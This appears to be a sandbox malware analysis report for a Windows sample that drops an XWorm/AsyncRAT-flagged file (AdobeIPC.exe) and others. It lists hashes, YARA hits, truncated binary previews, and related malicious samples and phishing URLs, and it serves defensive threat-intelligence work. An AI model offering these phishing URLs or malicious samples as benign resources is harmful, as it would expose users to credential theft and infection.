pastebin.com	test.doc	Get hash	malicious	Unknown	Browse	104.20.4.235
	invoice.exe	Get hash	malicious	MinerDownloader, RedLine, Xmrig	Browse	104.20.3.235
	awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.js	Get hash	malicious	Remcos	Browse	172.67.19.24
	egFMhHSlmf.exe	Get hash	malicious	Xmrig	Browse	172.67.19.24
	Quotation request YN2024-10-07pdf.vbs	Get hash	malicious	Remcos	Browse	104.20.4.235
	eshkere.bat	Get hash	malicious	Xmrig	Browse	104.20.4.235
	frik.exe	Get hash	malicious	Xmrig	Browse	104.20.3.235
	Google Chrome.exe	Get hash	malicious	Xmrig	Browse	172.67.19.24
	SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe	Get hash	malicious	Unknown	Browse	104.20.4.235
	SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exe	Get hash	malicious	Unknown	Browse	172.67.19.24

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BITREE-ASRU	bfWVPQsRO1.exe	Get hash	malicious	Njrat	Browse	193.161.193.99
	p61Wb0tocl.exe	Get hash	malicious	XWorm	Browse	193.161.193.99
	sUdsWh0FL4.exe	Get hash	malicious	XWorm	Browse	193.161.193.99
	YirR3DbZQp.exe	Get hash	malicious	XWorm	Browse	193.161.193.99
	WTB Middle East FZE 002124.jar	Get hash	malicious	ADWIND	Browse	193.161.193.99
	WTB Middle East FZE 002121.jar	Get hash	malicious	ADWIND	Browse	193.161.193.99
	Discord.exe	Get hash	malicious	Quasar	Browse	193.161.193.99
	NkxagQa6zn.exe	Get hash	malicious	StormKitty, XWorm	Browse	193.161.193.99
	KNUaGHzY9V.exe	Get hash	malicious	XWorm	Browse	193.161.193.99
	aimbot.exe	Get hash	malicious	XWorm	Browse	193.161.193.99
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	http://bancolombia-seguridad-co.glitch.me/	Get hash	malicious	Unknown	Browse	172.67.74.152
	http://telegiraum.club/	Get hash	malicious	Telegram Phisher	Browse	104.16.124.96
	https://pub-6e60812ea6034887a73a58b17a92a80f.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	172.66.0.235
	https://f120987.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	104.16.124.96
	https://japroippouquafou-5881.vercel.app/mixc.html	Get hash	malicious	HTMLPhisher	Browse	104.26.5.15
	http://posegulefra-4459.vercel.app/mixcc.html	Get hash	malicious	HTMLPhisher	Browse	104.26.4.15
	https://kucoinexplora.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	104.16.124.96
	https://shawri.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	162.247.243.29
	https://server.h74w.com/invite/12536668	Get hash	malicious	Unknown	Browse	104.21.52.99

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	hvnc-CR-SCR-0710.bin.exe	Get hash	malicious	PureCrypter	Browse	172.67.19.24
	hvnc-CR-SCR-0710.bin.exe	Get hash	malicious	PureCrypter	Browse	172.67.19.24
	https://pub-6e60812ea6034887a73a58b17a92a80f.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	172.67.19.24
	https://kucoinexplora.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	172.67.19.24
	https://shawri.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	172.67.19.24
	https://server.h74w.com/invite/12536668	Get hash	malicious	Unknown	Browse	172.67.19.24
	https://scary-wave.surge.sh/appeal/	Get hash	malicious	Unknown	Browse	172.67.19.24
	https://mail.flndmy-ld-usa.help/icloud-archivos/code2022esp.php	Get hash	malicious	Unknown	Browse	172.67.19.24
	https://business.helpcaseappealcenter.eu/community-standard/346299132520232	Get hash	malicious	Unknown	Browse	172.67.19.24
	https://4thclone-kk.netlify.app/	Get hash	malicious	HTMLPhisher	Browse	172.67.19.24

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\Guna.UI2.dll	SecuriteInfo.com.Trojan-Ransom.Win32.Zerber.gkca.4990.15640.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Trojan-Ransom.Win32.Zerber.gkca.4990.15640.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.MalwareX-gen.3895.3560.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.MalwareX-gen.3895.3560.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\AdobeIPC

Download File

Process:	C:\ProgramData\AdobeIPC.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	67072
Entropy (8bit):	6.08655557749346
Encrypted:	false
SSDEEP:	1536:/eb29b/DJUC7KLb9zZRuj4+biRXCSZ9E6aO0W6vU:quDGDb9zZ4j4+biR0OViU
MD5:	1F1441F1CC6080CF821CFDA93BD05E97
SHA1:	8949A0762D9B68247D52209653B95F649470DEEE
SHA-256:	C2B08BB76CE8BBB8D85504B6725BD33E473A591AF9BD358286C407B280D07440
SHA-512:	84EEDA4E49CEACB5ECC8017E95893D70D52176F973A0E0B1EA1E18098D65164F4A40AECEB17B17A091B288AEE0284B60B4CCA934CC513039E8736573210133D9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\AdobeIPC, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\AdobeIPC, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88% Antivirus: Virustotal, Detection: 66%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%5.f............................^.... ... ....@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................@.......H.......4`.........&.....................................................(.....r...p. .3 ...(.....r...p. ....s.........s.........s.........s..........r#..p. .....r...p. ..'..rE..p. ..e..rc..p. }>...r...p. ......((....r...p. .(T..r...p. ...."(....+.&(....&+..+5sa... .... .'..ob...(,...~....-.(J...(<...~....oc...&.-..r...p. .e2..r...p. G....r...p. .....r...p.r...p. ~.H..r$..p. .O...rB..p. ..................j..................sd...........

C:\ProgramData\AdobeIPC.exe

Download File

Process:	C:\Users\user\Desktop\jcMcDQ11pZ.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	67072
Entropy (8bit):	6.08655557749346
Encrypted:	false
SSDEEP:	1536:/eb29b/DJUC7KLb9zZRuj4+biRXCSZ9E6aO0W6vU:quDGDb9zZ4j4+biR0OViU
MD5:	1F1441F1CC6080CF821CFDA93BD05E97
SHA1:	8949A0762D9B68247D52209653B95F649470DEEE
SHA-256:	C2B08BB76CE8BBB8D85504B6725BD33E473A591AF9BD358286C407B280D07440
SHA-512:	84EEDA4E49CEACB5ECC8017E95893D70D52176F973A0E0B1EA1E18098D65164F4A40AECEB17B17A091B288AEE0284B60B4CCA934CC513039E8736573210133D9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\AdobeIPC.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\AdobeIPC.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88% Antivirus: Virustotal, Detection: 66%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%5.f............................^.... ... ....@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................@.......H.......4`.........&.....................................................(.....r...p. .3 ...(.....r...p. ....s.........s.........s.........s..........r#..p. .....r...p. ..'..rE..p. ..e..rc..p. }>...r...p. ......((....r...p. .(T..r...p. ...."(....+.&(....&+..+5sa... .... .'..ob...(,...~....-.(J...(<...~....oc...&.-..r...p. .e2..r...p. G....r...p. .....r...p.r...p. ~.H..r$..p. .O...rB..p. ..................j..................sd...........

C:\ProgramData\Guna.UI2.dll

Download File

Process:	C:\Users\user\Desktop\jcMcDQ11pZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2153864
Entropy (8bit):	5.819941808294719
Encrypted:	false
SSDEEP:	49152:cvrqKk8q2gqi2OXCt6kuSw9g8PTNTN/23uxjPHEiCAjFcm:cvrqZr
MD5:	C97F23B52087CFA97985F784EA83498F
SHA1:	D364618BEC9CD6F8F5D4C24D3CC0F4C1A8E06B89
SHA-256:	E658E8A5616245DBE655E194B59F1BB704AAEAFBD0925D6EEBBE70555A638CDD
SHA-512:	ECFA83596F99AFDE9758D1142FF8B510A090CBA6F42BA6FDA8CA5E0520B658943AD85829A07BF17411E26E58432B74F05356F7EAEB3949A8834FAA5DE1A4F512
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\Guna.UI2.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 2%, Browse
Joe Sandbox View:	Filename: SecuriteInfo.com.Trojan-Ransom.Win32.Zerber.gkca.4990.15640.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan-Ransom.Win32.Zerber.gkca.4990.15640.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.MalwareX-gen.3895.3560.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.MalwareX-gen.3895.3560.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L..........." ..0... ........... .. .... ...... ....................... !.......!...`................................... .O..... .\|............. .......!...................................................... ............... ..H............text..... .. .... ................. ..`.rsrc...\|..... ....... .............@..@.reloc........!....... .............@..B.................. .....H........A...................l..P ......................................{.4;..%m.c'.Y.!..V.WS.}.D#.!tn7'J.....WlV..mm#0.[.Z.wC6........-.D..~..:..'.. .,..do.,...p..[])s....<]%..&....k......I.9.......?.p}?...?......L>...>...?..L?...?..........L>...>...?...?...... .-.!.<.>.{.X.x.=.....H..>...?...?................1...E...Y...m...........}.Y.y.=...(N...r.(N.....}V.....}W.....}X...^.{a....{b...o+...(;......(......u....}.......9...(S...(....u9...}....2.{....o....b.r%..

C:\ProgramData\Stellar Generator.config

Download File

Process:	C:\Users\user\Desktop\jcMcDQ11pZ.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	187
Entropy (8bit):	4.9517397209148095
Encrypted:	false
SSDEEP:	3:JLWMNHU8LdgCzMvHcIMOofMuQVQDURAmIRMNHjFHr0lUfEyhTRpFKaFvREBAW4QA:JiMVBdTMkIGMfVJ7VJdfEyFRpwOJuAWq
MD5:	15C8C4BA1AA574C0C00FD45BB9CCE1AB
SHA1:	0DAD65A3D4E9080FA29C42AA485C6102D2FA8BC8
SHA-256:	F82338E8E9C746B5D95CD2CCC7BF94DD5DE2B9B8982FFFDDF2118E475DE50E15
SHA-512:	52BAAC63399340427B94BFDEB7A42186D5359CE439C3D775497F347089EDFBF72A6637B23BB008AB55B8D4DD3B79A7B2EB7C7EF922EA23D0716D5C3536B359D4
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" />.. </startup>..</configuration>

C:\ProgramData\Stellar Generator.exe

Download File

Process:	C:\Users\user\Desktop\jcMcDQ11pZ.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	253440
Entropy (8bit):	2.326581520852618
Encrypted:	false
SSDEEP:	768:VEg2EjM0krG/cROioI6qcDXoPfRJqMtZ3Fv:8gMLrXjl6qyoPfjqKl
MD5:	6B7FCE17300B729CA1C919AE47DB6C7D
SHA1:	2E49381B6A922BFAAFD040883B04E6A8AB6148B6
SHA-256:	132EE3A204736259C89A6AE74D5C43E832409FA331E39686C6910936A9C7989F
SHA-512:	E9EE8A63E72D6D11D6396A790C61B803DF3F20D326CF5279AFB4CF88E0838D393F8E0E9D06F27627AD8BDAEDDBDB41F996EAB6F1A2E2B91C26405E4C1C242F27
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 54% Antivirus: Virustotal, Detection: 35%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1............."...0.............r.... ........@.. .......................@............`.....................................O............................ ......\|...8............................................ ............... ..H............text...x.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................Q.......H........2..............LM..0...........................................6.(.....(......0..<.......s....r...p(......#...%....o......{.....s.......io.....o........0..<.......s....rE..p(......#...%....o......{.....s.......io.....o.....0..<.......s....r...p(......#...%....o......{.....s.......io.....o.....0..<.......s....r...p(......#...%....o......{.....s.......io.....o.....0..<.......s....r...p(......#...%....o......{.....s.......io.....o.....0..<.......s....rU..p(.....

C:\ProgramData\Stellar Generator.pdb

Download File

Process:	C:\Users\user\Desktop\jcMcDQ11pZ.exe
File Type:	MSVC program database ver 7.00, 512*71 bytes
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	2.954952401473622
Encrypted:	false
SSDEEP:	768:XYHo8FHo8UMsRIZgHHPlSG0rlRUQhfyWgjMsCSGwvQhfyWg:/IZgHHPlSG04QhfyWgWSHQhfyWg
MD5:	75F1AFD2D809F9C4B1753831907FD05A
SHA1:	B1553F00F64264E62FA5CF0F37F946ED6CAD1E3B
SHA-256:	C9A0FA7CBBFB4D617FB3BB90650B950176CCF5962CA4256B678D1E78EE62B7A8
SHA-512:	564CC1BACE8944D0B89B4B42BFD27421FC8AF401F7AA4D75982D19DB4440643162218EFDE4A3E649A74B6E428DD948E711BE3D00F669B6AECC2D2CFE1DEF3E57
Malicious:	false
Preview:	Microsoft C/C++ MSF 7.00...DS...........G...........D...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AdobeIPC.exe.log

Download File

Process:	C:\ProgramData\AdobeIPC.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AdobeIPC.log

Download File

Process:	C:\ProgramData\AdobeIPC
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\jcMcDQ11pZ.exe.log

Download File

Process:	C:\Users\user\Desktop\jcMcDQ11pZ.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\ProgramData\AdobeIPC.exe
File Type:	Generic INItialization configuration [WIN]
Category:	dropped
Size (bytes):	64
Entropy (8bit):	3.6722687970803873
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
MD5:	DE63D53293EBACE29F3F54832D739D40
SHA1:	1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
SHA-256:	A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
SHA-512:	10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
Malicious:	false
Preview:	....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2psyogwv.k3s.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3xothryz.ijd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ogmuane.uyt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5uz3ohrq.kz4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gparxsgw.ehe.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_htybpzt4.kpx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivhoya4t.z0t.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k0bwt0ye.50r.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldkyqj5g.mfs.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oknxujmk.cja.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
